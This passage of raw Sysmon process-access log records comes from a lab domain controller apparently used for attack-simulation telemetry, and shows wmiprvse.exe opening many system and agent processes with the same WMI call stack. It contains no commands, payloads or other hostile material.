Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026806Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026805Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026804Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026803Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026802Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026801Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026800Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026799Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026798Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026797Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026796Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026795Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026794Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026793Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026792Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026791Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026790Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026789Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026788Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026787Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 